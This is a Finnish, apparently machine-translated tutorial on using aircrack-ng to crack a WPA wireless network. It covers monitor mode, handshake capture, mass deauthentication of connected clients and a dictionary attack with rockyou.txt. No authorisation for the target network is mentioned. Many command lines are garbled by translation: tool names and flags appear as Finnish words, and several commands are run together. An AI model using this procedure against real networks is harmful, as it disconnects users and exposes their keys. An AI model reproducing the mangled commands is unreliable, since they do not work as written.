Airmon-ng
Airmon-ng: tä käytetään hallitsemaan langattomia korttitiloja ja tappamaan tarpeettomat prosessit aircrack-ng: n käytön aikana. Jos haluat haistaa langattoman yhteyden, sinun on vaihdettava langaton kortti hallitusta tilasta valvontatilaan, ja tähän tarkoitukseen käytetään airmon-ngia.
Ilmansyöttö
Airodump-ng on langaton hakas, joka voi kaapata langatonta dataa yhdestä tai useammasta langattomasta tukiasemasta. Sitä käytetään läheisten tukiasemien analysointiin ja kädenpuristusten sieppaamiseen.
Lentotoiminta
Aireplay-ng: tä käytetään uusintahyökkäyksissä ja pakettisuihkuttimena. Se voi poistaa käyttäjien todennuksen tukiasemistaan kädenpuristusten ottamiseksi.
Ilmaventtiili
Airdecap-ng: tä käytetään salaamaan salatut WEP-, WPA/WPA2-langattomat paketit tunnetulla avaimella.
Aircrack-ng
Aircrack-ng: tä käytetään hyökkäämään langattomiin WPA/WEP-protokolliin avaimen löytämiseksi.
Aircrack-ng on helppo asentaa Ubuntuun APT: n avulla. Kirjoita vain seuraava komento ja tämä asentaa kaikki Aircrack-ng-ohjelmiston työkalut.
sudo apt-get päivityssudo apt-get install -jaaircrack-ng
Käyttö
Tässä artikkelissa tarkastelemme pikaisesti, miten Aircrack-ng: n avulla voidaan murtaa salattu langaton verkko (tässä esimerkissä TR1CKST3R) salasanan löytämiseksi.
Luettele ensin kaikki käytettävissä olevat langattomat kortit, jotka on kytketty tietokoneeseesi käyttämällä 'iwconfig' -komentoa.
Tässä opetusohjelmassa käytämme wlxc83a35cb4546 -nimistä langatonta korttia (tämä voi olla eri asia sinun tapauksessasi). Nyt tappaa kaikki langattomalla kortilla toimivat prosessit airmon-ng: llä.
[sähköposti suojattu]: ~ $sudoilmailutarkastustappaaKäynnistä näyttötila 'wlxc83a35cb4546' kirjoittamalla
[sähköposti suojattu]: ~ $sudoairmon-ng start wlxc83a35cb4546
Nyt airmon-ng on aloittanut monitoritilan langattomalla kortilla, se näkyy eri nimellä 'wlan0mon'. Suorita 'iwconfig' uudelleen luetteloidaksesi langattoman yhteyden tiedot.
Käytä sitten airodump-ng-painiketta nähdäksesi lähellä olevat langattomat tukiasemat ja niiden ominaisuudet.
[sähköposti suojattu]: ~ $sudoairodump-ng wlan0mon
Voit rajata hakua käyttämällä MAC (–bssid) ja kanava (-c) suodattimia. Kättelyn kaappaamiseksi (kädenpuristus sisältää salatun salasanan) meidän on tallennettava paketit jonnekin käyttämällä –kirjoitus -vaihtoehtoa. Tyyppi,
[sähköposti suojattu]: ~ $sudoilmalämpöpumppu--bss6C: B7:49: FC:62: E4-c yksitoistawlan0mon--kirjoittaa /tmp/kädenpuristus. korkki
--bss: Tukiaseman MAC -osoite
-c: Tukiaseman kanava[1-13]
--kirjoittaa: Tallentaa kaapatut paketit määritettyyn paikkaan
Nyt meidän on poistettava kaikkien tämän tukiaseman laitteiden todennus Aireplay-ng-apuohjelmalla. Kirjoittaa
[sähköposti suojattu]: ~ $sudolentoliikenne-0 100 -kohteeseen [MAC_ADD]wlan0mon
-a: Määritä Aireplay-ng: n tukiasemien MAC
-0: Määritä lähetettävien deauth -pakettien määrä
Hetken kuluttua kaikki laitteet irrotetaan tästä tukiasemasta, kun ne yrittävät muodostaa yhteyden uudelleen, käynnissä oleva airodump-ng ottaa kättelyn. Se näkyy käynnissä olevan airodump-ng: n yläosassa.
Kädenpuristus on tallennettu hakemistoon '/tmp/', ja se sisältää salatun salasanan, joka voidaan raa'asti pakottaa offline -tilassa sanakirjan avulla. Salasanan murtamiseksi käytämme Aircrack-ng: tä. Tyyppi
[sähköposti suojattu]: ~ $sudoaircrack-ng/tmp/kädenpuristus. korkki-01. korkki-sisään/usr/Jaa/sanalistat/rockyou.txt
-sisään: Määritä sanakirjan sijainti
Aircrack-ng käy läpi salasanaluettelon, ja jos se löytyy, se näyttää avaimena käytetyn salasanan.
Tässä tapauksessa aircrack-ng löysi salasanan '123456789'.
Lopeta nyt langattoman kortin näyttötila ja käynnistä verkonhallinta uudelleen.
[sähköposti suojattu]: ~ $sudoairmon-ng stop wlan0mon[sähköposti suojattu]: ~ $sudopalveluverkonhallinnan uudelleenkäynnistys
Johtopäätös
Aircrack-ng: tä voidaan käyttää langattoman suojauksen tarkastamiseen tai unohtuneiden salasanojen murtamiseen. Tähän tarkoitukseen on saatavana myös muita vastaavia työkaluja, kuten Kismet, mutta aircrack-ng tunnetaan paremmin hyvästä tuesta, monipuolisuudesta ja laajasta työkaluvalikoimasta. Siinä on helppokäyttöinen komentoriviliitäntä, joka voidaan helposti automatisoida millä tahansa skriptikielellä, kuten Python.